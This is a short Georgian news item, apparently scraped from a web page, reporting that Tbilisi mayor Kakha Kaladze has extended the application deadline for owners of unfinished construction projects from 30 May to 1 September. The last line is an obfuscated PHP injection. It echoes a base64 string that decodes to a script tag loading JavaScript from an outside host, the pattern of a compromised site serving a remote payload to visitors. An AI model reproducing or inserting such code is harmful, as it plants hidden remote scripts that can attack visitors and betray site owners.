celsiusi
ავერსი საქკაბელი
თბილისის მერ კახა კალაძის განცხადებით, დაუმთავრებელი მშენებლობების მფლობელებს მერიისთვის მიმართვა 30 მაისის ნაცვლად 1 სექტემბრამდე შეუძლიათ. როგორც თბილისის მერმა დედაქალაქის მთავრობის სხდომაზე განმარტა, მერია მშენებლობების მფლობელებს მაქსიმალურად დაუდგება გვერდში.
 
„პრეფერენციების სისტემა შევქმენით, რაც არის სპეციალური რეგულაციები დაუმთავრებელ მშენებლობებთან დაკავშირებით, ბევრი პრობლემა მოგვარდა ამ მიმართულებით. განცხადებების წარდგენის ბოლო ვადად განსაზღვრული იყო 30 მაისი. გადავწყვიტეთ, რომ გავაგრძელოთ ეს ვადა და 1 სექტემბრამდე მივცეთ ადამიანებს შესაძლებლობა, რომ შემოიტანონ განაცხადები. შემოიტანეთ განცხადებები, ჩვენ მაქსიმალურად დაგიდგებით გვერდით“, -განაცხადა კალაძემ.
1266
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");